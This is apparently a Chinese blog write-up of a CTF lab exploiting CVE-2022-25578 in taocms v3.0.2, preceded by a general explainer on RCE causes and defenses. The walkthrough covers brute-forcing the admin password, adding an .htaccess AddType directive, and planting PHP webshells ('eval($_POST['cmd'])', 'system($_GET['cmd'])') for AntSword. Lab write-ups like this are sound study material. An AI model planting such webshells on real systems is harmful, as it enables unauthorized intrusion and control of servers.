【春秋云镜】CVE-2022-25578 taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码 解题思路

远程代码执行（RCE）漏洞

远程代码执行（RCE）漏洞允许攻击者在远程系统上执行任意代码，这可能导致数据泄露、服务中断、或者完全控制受影响的系统。RCE漏洞的原理和成因可以通过多种方式进行深入理解，以下是更详细的解释：

输入验证不足

许多RCE漏洞的根源在于应用程序或服务对用户输入的验证不充分。攻击者可以利用这一点，通过发送精心构造的输入（例如，在网页表单、HTTP请求头、或者应用程序API调用中）来执行恶意代码。这些输入可能包括但不限于SQL命令、脚本语言代码（如JavaScript）、或者操作系统命令。

软件缺陷和配置错误

软件中的编程错误或配置不当也常常导致RCE漏洞。例如，应用程序可能错误地处理外部数据（如反序列化外部提供的对象时执行其中包含的代码），或者服务以过高的权限运行，从而允许攻击者利用这些错误或配置来执行代码。

具体攻击技术

1. 命令注入

命令注入发生在应用程序将用户输入作为命令行指令的一部分执行时，未能适当地清理或验证这些输入。攻击者可以插入额外的命令，这些命令随后被操作系统执行。

2. SQL注入

通过SQL注入，攻击者可以在数据库查询中注入恶意SQL代码。虽然这通常关联于数据泄露，但在某些情况下，如果数据库服务器配置允许，它也可以用于执行操作系统级别的命令。

3. 反序列化漏洞

反序列化漏洞发生在应用程序反序列化来自不可信源的数据时，如果数据中包含恶意对象，那么这些对象可能会执行任意代码。Java和PHP是常见的受此类攻击影响的语言。

4. 文件上传漏洞

如果应用程序允许用户上传文件并以不安全的方式处理这些文件（例如，执行上传的文件或将文件存储在可执行路径下），攻击者可以上传包含恶意代码的文件以执行RCE攻击。

防御策略

防御RCE漏洞需要多层次的安全措施，包括：

• 严格的输入验证：确保对所有用户输入进行适当的清理和验证，以防止注入攻击。
• 使用安全的编码实践：避免使用可能导致RCE的不安全函数和方法，例如在反序列化数据或执行外部命令时采用安全的编程模式。
• 最小权限原则：运行应用程序和服务的账户应该具有完成其任务所需的最小权限，避免使用root或管理员账户。
• 安全配置：确保应用程序和服务器配置正确，避免不必要的服务和功能暴露给外部。
• 定期更新软件：及时应用安全补丁和软件更新，以修复已知漏洞。
• 使用安全工具和实践：利用防火墙、入侵检测系统、和安全扫描工具来识别和防御潜在的攻击尝试。

进入正题，开始做打靶的准备

涉及工具：

1、字典生成器

2、burpsuit

3、蚁剑/菜刀

解题思路：

1、信息收集：收集关于目标应用程序和其架构的信息，包括可能存在RCE漏洞的端点和页面

2、识别潜在目标：后台、交互点等等

3、修改配置文件、编写远程连接木马

4、拿flag

一、题目&tip

二、信息收集，发现后台登录界面，二话不说尝试弱密码

在这里我常用的账户及弱密码尝试遍了，也没登进去，那这样就麻烦点了，生成字典爆破吧。。。。这个过程是很耗时间的，拿出burpsuit

抓后台登陆包，扔到爆破模块

粘贴自己生成的字典集，开始爆破

爆破成功，账号为admin，密码tao

二、识别潜在目标，好了后台登录，按照题目提示修改.htaccess文件，编写远程连接木马

编辑.htaccess页面，代码如下

AddType application/x-httpd-php .jpeg .png

代码解释：

在.htaccess文件中，AddType application/x-httpd-php .jpeg .png 这行代码的意思是告诉Apache服务器，对于后缀为.jpeg和.png的文件，当它们被访问时，应该用PHP解析器来解析。

然而，这并不是代码注入攻击。这只是一个简单的Apache配置指令，它允许你在查看jpeg或png文件时运行PHP代码。

如果攻击者试图通过编辑.htaccess文件来执行代码注入攻击，他们可能会尝试插入恶意PHP代码，例如，<?php system($_GET['cmd']); ?>。然后，当有人访问被恶意修改的文件时，他们将执行任何传递给$_GET['cmd']的命令。

如果你发现你的.htaccess文件被修改了，你应该检查文件的修改日期和所有者，以确保它没有被未经授权的访问者更改。如果可能的话，你应该备份你的.htaccess文件，并定期检查它的内容，以确保它没有被修改。

找个.php文件编写我们自己的木马，我这里使用api.php

正常只添加<?php @eval($_POST['cmd']); ?>即可，我这边添加GIF89a是为了验证访问api.php是否成功，成功便会显示GIF89a，有助于我们观察，如果不加就回显空白，不好区分是否访问到了

http://xxxxx.com/api.php   #在网站根目录下直接可以访问到api.php

访问api.php回显如下

到这里，我们就可连接蚁剑了

轻松拿到flag

到这，此靶场就被我们攻克了，再见，大长腿在等着我呢

-----------------------------------------------------------声明--------------------------------------------------------------

尊敬的读者，

感谢您访问我的博客并阅读我的文章。我非常欢迎您在这里学习、分享和交流技术、知识和见解。

我要强调的是，我坚决反对任何形式的非法活动和滥用我的博客内容。请遵守以下原则：

1. **合法性**：我鼓励技术讨论和知识分享，但请不要将我的博客内容用于非法目的，包括但不限于黑客攻击、侵犯隐私、盗版、网络欺诈等。

2. **尊重他人**：请在评论和互动中保持尊重和礼貌，不要使用侮辱性、威胁性或冒犯性语言。

3. **知识产权**：尊重知识产权和版权。不要在未经授权的情况下复制、分发或传播我的博客内容。

4. **合法咨询**：如果您有任何与法律或道德有关的疑虑或问题，请咨询合法专业人士的建议。

我的目标是为读者提供有用的信息和资源，以促进学习和技术进步。我相信，只有在合法和道德的框架内，我们才能实现这一目标。

如果您对我的博客内容有任何疑虑或需要进一步了解，请随时联系我。感谢您的合作和理解。

最诚挚的问候，

                                                                                                                               Dark-Specter